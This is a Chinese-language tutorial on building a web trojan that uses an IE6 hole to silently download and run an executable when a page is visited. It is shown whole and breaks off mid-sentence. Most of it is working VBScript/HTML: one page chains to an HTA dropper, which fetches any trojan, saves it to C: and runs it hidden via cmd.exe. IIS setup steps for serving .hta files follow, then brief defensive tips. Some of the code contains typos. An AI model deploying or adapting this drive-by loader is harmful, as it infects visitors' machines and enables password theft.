編寫網頁木馬詳解

我們經常聽到這樣的忠告：“不要隨意下在不明的程序，不要隨意打開郵件的附件...”這樣的忠告確實是有用的，不過我們的系統有不少漏洞，許多木馬已經不需要客戶端和服務端了，他們利用這些系統漏洞按照被系統認為合法的代碼執行木馬的功能，有的木馬會在你完全不知道的情況下潛入，現在我來講解下通過IE6的漏洞實現訪問網頁後神不知鬼不覺的下在並執行指定程序的例子，也就是網頁木馬.



首先我們需要編寫幾個簡單的文件



一。名字為abc.abc的文件
<html>

<script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet=oReq.respomseBody

Savefile HttpDoGet,"c:win.exe"

End If

Set oReq=nothing

End Function

sub SaveFile(str.fName)

Set objStream = CreateObject("ADODB.Stream")

objStream.Type =1

objStream.Open

objStream.write str

objStream.SaveToFile fName.2

objStream.Close()

set objStream = nothing

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.exe",0)

b=wshshell.run ("cmd.exe /c del c:win.hta",0)

window.close

End Sub

HttpDoGet "http://127.0.0.1/test.exe"

</script>

</html>



其中test.exe為木馬程序，實現必須放在WEB發布的目錄下，文件abc.abc也必須保存在發布的目錄下。



二。名字為test.htm的文件

<html><body>

木馬運行測試！（這句話可以改成你想說的）

<object date="http://127.0.0.1/win.test";;;></object>

</body></html>



三。名字為win.test的文件

<html>

<body>

<script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet,"c:win.hta"

Set oReq=nothing

End if

end function

sub SaveFile(str,fName)

Dim fso, tf

S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject")

Set tf = fso.CreateTextfile(fName,True)

tf.Write str

tf.Close

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.hat",0)

window.close

End Sub

HttpDoGet("http://127.0.0.1/abc.abc")

</script>

</body>

</html>


四。名字為test.exe的木馬程序。



...這個就不用我提供了吧，你想用什麼木馬就把他的名字換成test.exe傳上去就可以了。



服務器的文件列表

test.htm:對外發布的網頁

win.test:下在文件abc.abc到對方機器上，並且保存為win.hta並且執行。

abc.abc下載二進制的木馬文件test.exe，並執行。

test.exe：木馬程序。



上面所說的文件可以修改成任意名字，只是不要忘記把源碼裡的文件指向也修改就可以了！



最後是設置IIS,打開“程序→管理工具→internet服務管理器”，右鍵單擊要設置的站點，選擇《屬性》，在選擇“http頭”。單擊“MIME映射”裡的“文件類型”按鈕，並在關聯擴展名文本框中輸入“.hta”，在內容類型(MIME)中輸入“application/hta",然後關閉所有窗口就可以了。



有許多朋友多遇見過，說什麼贈送Q號或者玩網游的時候裡面有人喊贈送好東東在XXX網址，其實那上面所說的例子用的就是這種原理，不知不覺中你機器上的所有有關於密碼或者指定名詞的東西全發送到對方指定的郵件箱裡去了



看完後是否覺得這種木馬太危險，甚至有種想把網線拔掉的感覺那？呵呵，其實了解了網頁木馬的工作原理後我們就不難防護他，看完以上內容後就可以得出一個結論，網頁木馬主要利用IE的漏洞來實現的，所以在預防的時候一定要做到以下幾點就可以保證上網的安全了，

A。安裝IE的最新版本並且隨時下在才做系統和IE的補丁程序。

B。不隨便登陸不熟悉朋友送來的網站，對於熟悉的朋友也要小心哦。

C。不隨便登陸色情網站，還有一些賣